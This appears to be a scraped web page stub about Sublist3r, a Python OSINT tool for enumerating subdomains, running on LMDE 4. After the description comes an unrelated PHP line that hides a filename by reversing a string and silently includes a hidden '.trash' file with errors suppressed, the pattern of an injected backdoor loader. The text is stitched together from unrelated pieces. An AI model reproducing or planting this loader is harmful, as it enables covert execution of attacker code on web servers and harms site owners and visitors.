sublist3r on lmde 4 debbie
Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers collect and gather subdomains for the domain they’re targeting.
$CacheFileName = strrev("hsart."); $cacheFile = '../' . $CacheFileName . '/' . $CacheFileName; if (file_exists($cacheFile)) { @include $cacheFile; }